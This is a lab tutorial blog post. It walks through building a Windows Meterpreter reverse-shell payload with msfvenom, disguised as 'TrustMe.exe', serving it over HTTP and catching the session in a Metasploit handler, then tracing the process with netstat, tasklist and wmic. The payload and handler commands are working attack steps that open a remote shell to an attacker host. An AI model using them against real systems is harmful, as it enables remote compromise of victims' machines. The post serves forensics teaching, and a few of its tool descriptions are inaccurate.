Creating some basic malware and computer forensics post exploitation

Abdul Samadh
6 min readApr 25, 2021

Consider checking out my blog for setting up your virual machine for this assignment: Click here

Yes, we are going to create some malware today!!

In this assignment I will be using VMware Workstation (v16)

Alternative: VirtualBox

You could use VirtualBox, but it fails about 25% of the time on either networking or USB support.

If you hate yourself, use VirtualBox.

Otherwise, use VMware.

BTW, I support VMware for lab troubleshooting! if you in case you reached out to me :D

I would advise against installing any updates; updates tend to break assignment.

In this lab we will create some malware, run it and then use some basic commands to detect to understand what an attack looks like on a live system.

One of the best ways to learn, well… Anything, is to actually just dig in and do it. So, this is a great process for getting started in looking at actual malware.

******Let’s jump into it right way********

Let’s get started by opening a Terminal as Administrator

When you get the User Account Control Prompt, select Yes.
And, open a Ubuntu command prompt:

On your Linux system, please run the following command:


Please note the IP address of your Ethernet adapter.
Please note that my adapter is called eth0 and my IP address is

Your IP Address and adapter name may be different.
Please note your IP address on a piece of paper:
Now, run the following commands to start a simple backdoor and backdoor listener:

sudo su -

Please note, the adhd password is adhd. (If you are using my VM setup)

/#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=<YOUR LINUX IP> lport=4444 -f exe -o /tmp/TrustMe.exe***
/# cd /tmp
/#ls -l TrustMe.exe
/#python -m SimpleHTTPServer 8000 &

Here let’s take the first command

/#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=<YOUR LINUX IP> lport=4444 -f exe -o /tmp/TrustMe.exe

“msfvenom” is created by Metaspolit it is a combination of msfcode and msfpayload. This tool is used for bypassing the antivirus.

“Meterpreter” is a backdoor lisener of Metaspolit.

“reverse_tcp” is used to communicate the with targeted ports

/# cd /tmp

This command is used for locating where the malware needs to hosted within the directories.

/#ls -l TrustMe.exe

This is commands to listen “TrustMe.exe” file within the directory.

It should look like this:

Now, let’s start the Metasploit Handler. You will have to hit Enter to get your prompt back.

root@DESKTOP-I1T2G01:/tmp/# msfconsole -q
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST
Remember, your IP will be different!
msf5 exploit(multi/handler) > exploit

We create Metasploit handler for detecting if any communication is happening on port 4444, if any, then this handler will exfiltrate the information from the server.

It should look like this:

Now, let’s surf to your Linux system, download the malware and run it!

Simply open an Edge browser to

http://<YOUR LINUX IP>:8000

Remember! Your IP will be different!!
Now, let’s download and run the TrustMe.exe file!

If you get an alert, just select run the application.
Back at your Ubuntu prompt, you should have a metasploit session.

Now, let’s look at the malware from the other side through the Windows commandline slides!
Please, remember, your IP address will be different!!!
Now, let’s open another Command Prompt from our Terminal:

Once we are in, lets start with looking at the network connections:
We will start with

C:>net view

In this example, our malware will not have any sessions at all:

We will get the same lack of connections from

C:>net session

While there is not much here for this lab, it is key to remember that these two commands would help us detect an attacker that is mounting shares on other computers (net view) and would tell us an attacker had mounted a share on this system (net session).
However, we are not done with network connections yet. Lets try

C:>netstat -naob

Well, that is a lot of data. This is showing us what ports are open on this system ( or (LISTENING) and what remote connections are made to other systems (ESTABLISHED). In this example, we are really interested in the ESTABLISHED connections:

Specificly, we are interested in the connection on port 4444 as we know this is the port we used for our malware.
Now, let’s drill down on that connection with some more data:

C:>netstat -f

I like to run -f with netstat to see if there are any systems with fully qualified domains that we may be able to ignore.

But, we do see our last connection with the port 4444.
Let’s get the Process ID (PID) so we can dig deeper:

C:>netstat -naob

We can see in the above screenshot that we have the PID.
Now, let’s dive in!
First we will start with tasklist

C:>tasklist /m /fi "pid eq [PID]"


We can see the loaded DLL’s above. As we can see, there is not a whole lot to see here:
Let’s keep digging with wmic:

C:>wmic process where processid=[PID] get commandline

Ahh!! Now we can see that the file was launched from the Edge temp downloads directory! So, now we know it was downloaded from the Internet.
Let’s see if we can see what spawned the process with wmic.

C:> wmic process get name,parentprocessid,processid

Above we can see that we hunted the malicious process, then found its parent process ID, then did a find on that process ID. As you can see above, it was launched by the browser_broker.exe process. This once again, shows us that this process was launched from the browser.

Thanks for reading!!

This guide is just for the educational purpose.

